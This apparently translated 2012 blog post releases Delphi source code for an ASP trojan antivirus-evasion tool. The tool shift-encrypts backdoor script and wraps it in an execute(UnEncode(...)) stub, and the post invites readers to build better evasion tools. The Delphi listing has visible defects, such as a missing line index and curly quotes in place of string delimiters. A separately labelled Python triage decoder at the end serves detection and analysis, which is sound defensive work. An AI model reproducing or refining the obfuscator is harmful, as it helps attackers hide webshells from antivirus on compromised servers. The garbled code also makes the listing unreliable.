Mumaasp release: source code of an ASP trojan AV-evasion tool

2012-11-06

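Simple AV evasion for ASP trojans; it only supports simple encryption of the content inside <% %> in an ASP file.

The principle is simple. It follows lake2's 《ASP后门之终极伪装》 ("The Ultimate Disguise for ASP Backdoors") and encrypts the ASP with a shift method. Because the processing is fairly troublesome, the whole ASP file is not encrypted, but this is enough to achieve AV evasion for ordinary web trojans. Related tools include the work of 黑客伟. This only offers an idea; I hope everyone can make better AV-evasion tools.

Save the ASP script to be encrypted on its own as an asp file; the file may contain text before and after <% %>.

Main part of the code: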

unit Unit1;

interface

uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, Buttons;

type
TForm1 = class(TForm)
Edit1: TEdit;
SpeedButton1: TSpeedButton;
OpenDialog1: TOpenDialog;
Button1: TButton;
Button2: TButton;
procedure Button2Click(Sender: TObject);
procedure SpeedButton1Click(Sender: TObject);
procedure Button1Click(Sender: TObject);
procedure FormCreate(Sender: TObject);
private
{ Private declarations }
but:integer;
KeyName:widestring;
Crlf:WideString;
//shift-method encoding
function Shift(FName:string):WideString;
function UnEncodeStr:WideString;
procedure FileASP;
public
{ Public declarations }
end;

var
Form1: TForm1;

implementation

{$R *.dfm}

procedure TForm1.Button2Click(Sender: TObject);
begin
close;
end;

procedure TForm1.SpeedButton1Click(Sender: TObject);
begin
if OpenDialog1.Execute then
edit1.Text :=OpenDialog1.FileName;
end;

procedure TForm1.Button1Click(Sender: TObject);
begin
if trim(edit1.Text)=” then
begin
MessageBox(0,’请选择要加密的文件!’,'提示’,MB_ICONINFORMATION);
exit;
end;
if pos(‘.asp’,edit1.Text)=0 then
begin
MessageBox(0,’请选择正确的文件格式!’,'提示’,MB_ICONINFORMATION);
Exit;
end;
FileASP;
MessageBox(0,’加密完成!’,'提示’,0);
end;

procedure TForm1.FileASP;
VAR f:TEXTfile;
st:WideString;
begin
assignfile(f,ExtractFileDir(Application.Exename)+’\muma.asp’);
st:=Shift(trim(Edit1.Text));
rewrite(f);   //create
writeln(f,st); //write output
closefile(f); //close the file
end;

function TForm1.Shift(FName: string): WideString;
var
f:TStringList;
i,j,pk:integer; //shift parameter should be between -95 and +95
cc:WideString;
begin
result:=”;
cc:=”;
f:=TStringList.Create;
try
f.LoadFromFile(FName);
for i:=0 to f.Count-1 do
begin
cc:=cc+f+KeyName;
end;
finally
f.Free;
end;
cc:=StringReplace(cc,’<%’,”,[rfReplaceAll]);
cc:=StringReplace(cc,’%>’,”,[rfReplaceAll]);
for j:=1 to length(cc) do
begin
//09: Tab key
if (cc[j]<>KeyName) and (Ord(cc[j])<>9) and (Ord(cc[j])<127) then
begin
begin
pk:=Ord(cc[j])+but;
if pk>126 then
pk:=pk-95
else if pk<32 then
pk:=pk+95;
Result:=Result+Chr(pk);
end;
end else
Result:=Result+cc[j];
end;
Result:=’<%’+Crlf+’xu=”‘+StringReplace(Result,’”‘,’”"‘,[rfReplaceAll])+
‘”‘+Crlf+’execute(UnEncode(xu))’+Crlf+UnEncodeStr;
end;

function TForm1.UnEncodeStr: WideString;
var Str:string;
begin
Str :=’function UnEncode(temp)’+Crlf+
‘   but=’+inttostr(but)+Crlf+
‘   for i = 1 to len(temp)’+Crlf+
‘     if mid(temp,i,1)<>”‘+KeyName+’” then’+Crlf+
‘         If Asc(Mid(temp, i, 1)) < 32 Or Asc(Mid(temp, i, 1)) > 126 Then’+Crlf+
‘           a = a & Chr(Asc(Mid(temp, i, 1)))’+Crlf+
‘         else’+Crlf+
‘           pk=asc(mid(temp,i,1))-but’+Crlf+
‘           if pk>126 then’+Crlf+
‘             pk=pk-95′+Crlf+
‘           elseif pk<32 then’+Crlf+
‘             pk=pk+95′+Crlf+
‘           end if’+Crlf+
‘           a=a&chr(pk)’+Crlf+
‘         end if’+Crlf+
‘     else’+Crlf+
‘         a=a&vbcrlf’+Crlf+
‘     end if’+Crlf+
‘   next’+Crlf+
‘   UnEncode=a’+Crlf+
‘end function’+Crlf+
‘%>’;

Result :=Str;
end;

procedure TForm1.FormCreate(Sender: TObject);
begin
//pick the shift parameter at random
Randomize;
but:=trunc(random(95+1+95)-95);
//but:=1;
KeyName:=Chr(random(128)+127)+Chr(random(127)+128);
//KeyName:=’琳’;
Crlf:=char(13)+char(10);
end;

end.
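
For triage of files produced by this tool, the Python code below (an added example, not part of the original post or tool) recognises the generated stub by its execute(UnEncode(...)) call and the embedded but= shift constant, then reverses the shift so an analyst can read the hidden script without executing it. The sample input, the '§' separator and the function names unshift and triage are constructed for illustration.

```python
import re

# The generated stub always ends with execute(UnEncode(<var>)) followed by a
# decoder that embeds the shift ("but=N") and the line-separator character.
STUB_RE = re.compile(r'execute\s*\(\s*UnEncode\s*\(\s*(\w+)\s*\)\s*\)', re.I)
SHIFT_RE = re.compile(r'\bbut\s*=\s*(-?\d+)', re.I)
SEP_RE = re.compile(r'<>\s*"([^"]+)"\s*then', re.I)

def unshift(text, shift):
    """Mirror of the stub's UnEncode: undo the shift on printable ASCII only."""
    out = []
    for ch in text:
        code = ord(ch)
        if 32 <= code <= 126:
            code -= shift
            if code > 126:
                code -= 95
            elif code < 32:
                code += 95
        out.append(chr(code))
    return "".join(out)

def triage(asp_text):
    """Return None if the stub is absent, else the shift, separator and decoded script."""
    stub = STUB_RE.search(asp_text)
    if not stub:
        return None
    shift = SHIFT_RE.search(asp_text, stub.end())
    literal = re.search(r'\b%s\s*=\s*"((?:[^"]|"")*)"' % re.escape(stub.group(1)),
                        asp_text, re.I)
    if not (shift and literal):
        return None
    sep = SEP_RE.search(asp_text, stub.end())
    blob = literal.group(1).replace('""', '"')   # undo VBScript quote doubling
    lines = blob.split(sep.group(1)) if sep else [blob]
    decoded = "\r\n".join(unshift(l, int(shift.group(1))) for l in lines)
    return {"shift": int(shift.group(1)), "separator": sep.group(1) if sep else None,
            "decoded": decoded}

# Constructed sample: benign two-line script, shift -3, '§' as separator,
# decoder body abbreviated to the lines the regexes rely on.
SAMPLE = '''<%
xu="Obpmlkpb+Tofqb|~lh~§$2-""§"
execute(UnEncode(xu))
function UnEncode(temp)
   but=-3
     if mid(temp,i,1)<>"§" then
end function
%>'''
```

Because the shift and separator are randomised per run, the stable indicators are the execute(UnEncode(...)) call and the decoder function itself, not the encoded string.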
